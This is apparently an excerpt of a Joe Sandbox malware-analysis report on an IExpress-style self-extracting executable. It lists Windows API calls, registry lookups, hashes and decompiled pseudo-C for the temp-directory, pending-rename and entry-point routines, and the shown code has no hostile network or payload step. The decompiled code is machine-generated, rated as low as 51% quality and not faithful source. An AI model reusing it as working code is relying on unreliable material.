                                                                                                                                                                                                                                            0x00a4452e
                                                                                                                                                                                                                                            0x00a4453f
                                                                                                                                                                                                                                            0x00a4453f
                                                                                                                                                                                                                                            0x00a44530
                                                                                                                                                                                                                                            0x00a44531
                                                                                                                                                                                                                                            0x00a44538
                                                                                                                                                                                                                                            0x00a4453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4453d
                                                                                                                                                                                                                                            0x00a44554
                                                                                                                                                                                                                                            0x00a4455a
                                                                                                                                                                                                                                            0x00a4455a
                                                                                                                                                                                                                                            0x00a4455a
                                                                                                                                                                                                                                            0x00a44525
                                                                                                                                                                                                                                            0x00a4468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A445A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A445E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A4460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A44630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00A44666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A4466F
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A4686E
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: GetSystemMetrics.USER32(0000004A), ref: 00A468A7
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A468CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,?,0000000C), ref: 00A468F4
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegCloseKey.ADVAPI32(?), ref: 00A46902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                                                            • API String ID: 3244514340-2605220145
                                                                                                                                                                                                                                            • Opcode ID: c4993cdbae557bf728cccbb3dbb720ff5b467d507dc55b6b85c0ff0b3ca40a29
                                                                                                                                                                                                                                            • Instruction ID: 4e9ed8ccb56bba2bbd7a5f54fbc10571f2d160e9b5f62d2b58435a0e7360aa55
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4993cdbae557bf728cccbb3dbb720ff5b467d507dc55b6b85c0ff0b3ca40a29
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451E47D900115ABDF21DF68DC48BAABB69EFCA300F114194FD09A7241DB72DD46CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A453A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A4171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00A41680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E00A4658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00A46CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0xa48a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a453ac
                                                                                                                                                                                                                                            0x00a453b3
                                                                                                                                                                                                                                            0x00a453b9
                                                                                                                                                                                                                                            0x00a453bb
                                                                                                                                                                                                                                            0x00a453bd
                                                                                                                                                                                                                                            0x00a453bf
                                                                                                                                                                                                                                            0x00a453d1
                                                                                                                                                                                                                                            0x00a453d6
                                                                                                                                                                                                                                            0x00a453e0
                                                                                                                                                                                                                                            0x00a453e2
                                                                                                                                                                                                                                            0x00a453f5
                                                                                                                                                                                                                                            0x00a453fb
                                                                                                                                                                                                                                            0x00a45402
                                                                                                                                                                                                                                            0x00a4540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45415
                                                                                                                                                                                                                                            0x00a45416
                                                                                                                                                                                                                                            0x00a45427
                                                                                                                                                                                                                                            0x00a4542a
                                                                                                                                                                                                                                            0x00a4542b
                                                                                                                                                                                                                                            0x00a45434
                                                                                                                                                                                                                                            0x00a45434
                                                                                                                                                                                                                                            0x00a4543a
                                                                                                                                                                                                                                            0x00a4544c
                                                                                                                                                                                                                                            0x00a4544c
                                                                                                                                                                                                                                            0x00a45452
                                                                                                                                                                                                                                            0x00a4545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4545e
                                                                                                                                                                                                                                            0x00a4545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A453FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-3862032828
                                                                                                                                                                                                                                            • Opcode ID: c5740d479d061de3a84f4e50ad29af358743f4423dc5ab0cd1a971faa335cfa9
                                                                                                                                                                                                                                            • Instruction ID: 681facc2eea4b819e2ad3ae8855d4498ffff74cddc18d44055931952e8d06d05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5740d479d061de3a84f4e50ad29af358743f4423dc5ab0cd1a971faa335cfa9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11017DB4050467E320EBB69C49FAF766EEFD3312F000125F646D6291CE75898386A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 a4256d-a4257d 564 a42622-a42627 call a424e0 563->564 565 a42583-a42589 563->565 570 a42629-a4262f 564->570 567 a425e8-a42607 RegOpenKeyExA 565->567 568 a4258b 565->568 571 a425e3-a425e6 567->571 572 a42609-a42620 RegQueryInfoKeyA 567->572 569 a42591-a42595 568->569 568->570 569->570 574 a4259b-a425ba RegOpenKeyExA 569->574 571->570 575 a425d1-a425dd RegCloseKey 572->575 574->571 576 a425bc-a425cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A4256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E00A424E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a42572
                                                                                                                                                                                                                                            0x00a42573
                                                                                                                                                                                                                                            0x00a42575
                                                                                                                                                                                                                                            0x00a42578
                                                                                                                                                                                                                                            0x00a4257d
                                                                                                                                                                                                                                            0x00a42627
                                                                                                                                                                                                                                            0x00a42583
                                                                                                                                                                                                                                            0x00a42586
                                                                                                                                                                                                                                            0x00a42589
                                                                                                                                                                                                                                            0x00a425eb
                                                                                                                                                                                                                                            0x00a42607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42609
                                                                                                                                                                                                                                            0x00a4261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4258b
                                                                                                                                                                                                                                            0x00a4258b
                                                                                                                                                                                                                                            0x00a4259e
                                                                                                                                                                                                                                            0x00a425b2
                                                                                                                                                                                                                                            0x00a425ba
                                                                                                                                                                                                                                            0x00a425cb
                                                                                                                                                                                                                                            0x00a425d1
                                                                                                                                                                                                                                            0x00a425d6
                                                                                                                                                                                                                                            0x00a425da
                                                                                                                                                                                                                                            0x00a425dd
                                                                                                                                                                                                                                            0x00a425dd
                                                                                                                                                                                                                                            0x00a425e3
                                                                                                                                                                                                                                            0x00a425e3
                                                                                                                                                                                                                                            0x00a425e3
                                                                                                                                                                                                                                            0x00a4258b
                                                                                                                                                                                                                                            0x00a42589
                                                                                                                                                                                                                                            0x00a4262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A44096,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?), ref: 00A425B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?,00A44096), ref: 00A425CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A41ED3,00000001,00000000,?,?,00A44137,?,00A44096), ref: 00A425DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A44096,00A44096,?,00A41ED3,00000001,00000000,?,?,00A44137,?), ref: 00A425FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A44096,00000000,00000000,00000000,00000000,?,00A41ED3,00000001,00000000), ref: 00A4261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A425F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A425C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A425A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: f4ad9303a4fdb93f2159785282e938d2885b684862037b257d46b75534d42ce0
                                                                                                                                                                                                                                            • Instruction ID: 780b93538df1ed17f3c24346977bc19c62c3398b3e818c78894aa7505722f6a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4ad9303a4fdb93f2159785282e938d2885b684862037b257d46b75534d42ce0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D311823D942228BBAB20DB91AC09EFFBE7CEFD27A1F504055B809A2000D7354E45E7A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 577 a46a60-a46a91 call a47155 call a47208 GetStartupInfoW 583 a46a93-a46aa2 577->583 584 a46aa4-a46aa6 583->584 585 a46abc-a46abe 583->585 586 a46aaf-a46aba Sleep 584->586 587 a46aa8-a46aad 584->587 588 a46abf-a46ac5 585->588 586->583 587->588 589 a46ac7-a46acf _amsg_exit 588->589 590 a46ad1-a46ad7 588->590 591 a46b0b-a46b11 589->591 592 a46b05 590->592 593 a46ad9-a46ae9 call a46c3f 590->593 594 a46b13-a46b24 _initterm 591->594 595 a46b2e-a46b30 591->595 592->591 599 a46aee-a46af2 593->599 594->595 597 a46b32-a46b39 595->597 598 a46b3b-a46b42 595->598 597->598 600 a46b44-a46b51 call a47060 598->600 601 a46b67-a46b71 598->601 599->591 602 a46af4-a46b00 599->602 600->601 611 a46b53-a46b65 600->611 604 a46b74-a46b79 601->604 605 a46c39-a46c3e call a4724d 602->605 608 a46bc5-a46bc8 604->608 609 a46b7b-a46b7d 604->609 612 a46bd6-a46be3 _ismbblead 608->612 613 a46bca-a46bd3 608->613 614 a46b94-a46b98 609->614 615 a46b7f-a46b81 609->615 611->601 619 a46be5-a46be6 612->619 620 a46be9-a46bed 612->620 613->612 617 a46ba0-a46ba2 614->617 618 a46b9a-a46b9e 614->618 615->608 616 a46b83-a46b85 615->616 616->614 621 a46b87-a46b8a 616->621 622 a46ba3-a46bbc call a42bfb 617->622 618->622 619->620 620->604 624 a46c1e-a46c25 620->624 621->614 625 a46b8c-a46b92 621->625 622->624 630 a46bbe-a46bbf exit 622->630 626 a46c27-a46c2d _cexit 624->626 627 a46c32 624->627 625->616 626->627 627->605 630->608
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A47155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa472b8);
                                                                                                                                                                                                                                            				E00A47208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa488b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa488b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa481e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa488b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A46C3F(0xa410b8, 0xa410c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A46FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa488b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa410b4);
                                                                                                                                                                                                                                            							_push(0xa410ac);
                                                                                                                                                                                                                                            							L00A47202();
                                                                                                                                                                                                                                            							 *0xa488b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa488ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa488b4;
                                                                                                                                                                                                                                            						if( *0xa488b4 != 0 && E00A47060(_t71, 0xa488b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa488b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa4a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A42BFB(0xa40000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa481e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa481f8;
                                                                                                                                                                                                                                            							if( *0xa481f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa481e4;
                                                                                                                                                                                                                                            							if( *0xa481e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa481e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
